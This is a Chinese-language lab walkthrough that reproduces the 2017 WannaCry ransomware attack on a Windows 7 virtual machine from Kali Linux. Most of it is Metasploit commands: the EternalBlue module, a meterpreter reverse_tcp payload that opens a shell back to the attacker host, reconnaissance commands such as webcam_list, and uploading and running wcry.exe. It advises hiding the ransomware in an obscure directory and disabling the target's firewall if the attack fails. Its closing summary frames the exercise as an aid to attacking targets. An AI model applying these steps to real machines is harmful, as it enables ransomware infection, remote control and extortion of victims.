一、背景
2017年5月12日起,全球范围内爆发的基于Windows网络共享协议进行攻击传播的蠕虫恶意代码,不法分子通过改造之前泄露的NSA黑客武器库中“永恒之蓝”攻击程序发起的网络攻击事件。英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
二、攻击方式
恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
三、攻击还原
1、环境准备
(1)虚拟机:在物理机上安装虚拟机,本还原过程使用vmware
workstationVMware® Workstation 12 Pro,版本号为12.5.0
build-4352439。没有软件的同学网上找就是行了。
(2)操作系统:在虚拟机中打开安装好两个操作系统,一台为64位,windows 7旗舰版,一台为kali linux。
(3)探测攻击目标:以kali linux作为攻击点对window 7进行攻击,首先确定win 7攻击目标存在,假设我们预先知道win7IP地址如下:
在kali linux中,使用如下命令进行检查,并确定ms 17010漏洞存在:
2、攻击部署
(1)启动postgresql 服务,为了加快search命令的查询速度而已
(命令)servive postgresql start
(2)进入msf接口或者说控制台,msf的系统文件和用户文件位于/usr/share/metasploit-framework/msfconsole目录下。
(命令)msfconsole
(3) 调用漏洞模块,并查看该模块的使用参数
(命令)use exploit/windows/smb/ms17_010_eternalblue
(命令):options
(4)通过参数指定攻击目标:
(命令)set RHOST 192.168.1.17
(5)设置攻击负载(攻击载荷是针对特定平台的一段攻击代码,它通过网络传送到攻击目标进行执行)
(命令)set payload windows/x64/meterpreter/reverse_tcp
(6)设定监听主机(发动攻击的主机)
(命令) set LHOST 192.168.1.18
(7)查看配置情况
(命令) show options
3、正式攻击
(1)发起攻击
(命令) exploit
(2)获取系统重要信息
(用户ID:命令)getuid
(扫描是否有摄像头:命令)webcam_list
(查询路由:命令)route
(3)上传勒索文件至C盘根目录下,为了隐蔽可以传至更隐蔽目录
(命令)upload wcry/wcry.exe c:\
(命令)upload wcry/FILE_ID.DIZ c:\
(4)执行勒索可执行文件即可
(命令)execute -f c:\wcry.exe
至此,勒索成功…………………………………………………………
四、FAQ
(1)攻击未成功,看提示说明没有连接上win7.................
解决办法:关闭win7防火墙即可!!!
(2)查看帮助,按照思路进行上传病毒文档
五、总结
通过这次渗透还原“永恒之蓝”勒索Win7实验,事实证明我们要攻击目标,首先就是找到目标,利用端口扫描等各种分析工具,对目标进行全面,确认是否有漏洞,比如弱密码,开放端口,权限机制缺失等,进而具体针对攻击,以达成目的!!!
